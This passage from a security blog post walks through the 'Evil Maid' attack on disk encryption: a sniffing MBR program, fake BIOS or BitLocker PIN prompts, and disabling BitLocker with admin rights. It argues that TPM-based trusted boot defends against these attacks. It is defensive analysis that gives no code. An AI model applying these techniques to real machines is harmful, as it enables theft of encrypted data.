  3. But then you have an appointment at the hotel SPA (at least this little fun you can have on a business trip, right?). Obviously you don't want to look so geeky and you won't take your laptop with you to the SPA, will you? The Evil Maid has just been waiting for this occasion… She sneaks into your room again and powers up your laptop. She presses a magic key combo, which results in the Evil Program displaying the sniffed decryption password. Now, depending on her level of subtlety, she could either steal your whole laptop or only the more important data from it. Your system disk encryption software is completely useless against her now.
(Yes, I know that's 3 bullets, but the Evil Maid had to sneak into your room only twice:)

So, why would BitLocker not allow this simple attack? Because the BitLocker software should actually be able to tell that the system has been compromised (by the Evil Program) since the last boot. BitLocker should then refuse to display a password prompt. And even if it didn't, and asked the user for the password, it still would not be able to get the actual decryption key out of the TPM, because the values in certain PCR register(s) would be wrong (they would now account for the modified hashes of the MBR, PCI EEPROM, or BIOS). The bottom line is: the maid is not getting the decryption key (and now, neither is the user), which is what this is all about.

At least this is how BitLocker should work. I should add a disclaimer here that neither I nor anybody from my team has looked into the BitLocker implementation. We have not because, as of yet, there have been no customers interested in this kind of BitLocker implementation evaluation. Also, I should add that Microsoft has not paid me to write this article. I simply hope it might positively stimulate other vendors, e.g. TrueCrypt (Hi David!) or Apple, to add SRTM or, better yet, DRTM to their system encryption products.

Of course, when we consider an idiot attack that involves simply grabbing somebody's laptop and running away with it (i.e. without any prior preparation, unlike our Evil Maid), then probably any system disk encryption software would be good enough (assuming it doesn't have any bugs in the crypto code).

Some people might argue that using a BIOS password would be just as good as using trusted boot. After all, if we disable booting from alternate media (e.g. USB sticks) in the BIOS and lock down the BIOS using a password (i.e. the power-on password, not just the BIOS supervisor password), then the above two-stage attack should not be feasible. Those people might argue that even if the Evil Maid had cleared the CMOS memory (by removing the CMOS battery from the motherboard), they would still be able to notice that something is wrong — the BIOS would no longer be asking for the password, or the password would be different from the one they used before.

That is a valid point, but relying on the BIOS password to provide security for all your data might not be such a good idea. The first problem is that BIOSes have had a long history of various default or "maintenance" passwords (I actually do not know how the situation with those default passwords looks today). Another problem is that the attacker might first clear the CMOS memory and then modify her Evil MBR program to also display a fake BIOS password prompt that would accept anything the user enters. This way the user will not be alerted that something is wrong and will willingly provide the real drive decryption password when prompted later by the actual drive encryption software.

One might ask why the attacker can't use a similar attack against BitLocker. Even if the real BitLocker uses a trusted boot process, we can still infect the MBR, display a fake BitLocker PIN prompt, and this way get possession of the user's PIN.

This attack, however, can be spotted by an inquisitive user — after all, if he or she knows they provided the correct PIN, then it would be suspicious not to see the system boot (and it won't boot, because the fake BitLocker will not be able to retrieve the decryption key from the TPM). If the fake BitLocker wanted to boot the OS (so that the user didn't suspect anything), it would have to remove itself from the system and then reboot the system. Again, this should alert the user that something wrong is going on.

There is also a much more elegant way of defending against the above attack (the one with the fake BitLocker prompt) — but I'd rather let Microsoft figure it out by themselves ;)

By the way, contrary to popular belief, BitLocker doesn't protect your computer from boot-stage infections, e.g. MBR viruses or BIOS/PCI rootkits. As we have been pointing out since the first edition of our Understanding Stealth Malware training at Black Hat in August 2007, BitLocker should not be thought of as system integrity protection. This is because it is trivial for any malware that has already got access to the running Vista to re-seal the BitLocker key to an arbitrary new system firmware/MBR configuration. Everybody can try it by going to Control Panel/BitLocker Drive Encryption, then clicking "Turn Off BitLocker" and choosing "Disable BitLocker Drive Encryption". This will simply save your disk decryption key in plaintext, allowing you to e.g. reflash your BIOS, boot Vista again, and then enable BitLocker again (this would generate a new key and seal it to the TPM with the new PCR values).


This functionality has obviously been provided to allow the user to update his or her firmware. But what is important to keep in mind is that this process of disabling BitLocker doesn't involve entering any special password or PIN (e.g. the BitLocker PIN). It is enough that you are the default user with admin rights, or some malware running in that context. Pity they decided on the simplest solution here. But still, BitLocker is simply the coolest thing in Vista and something I really miss on all other OSes...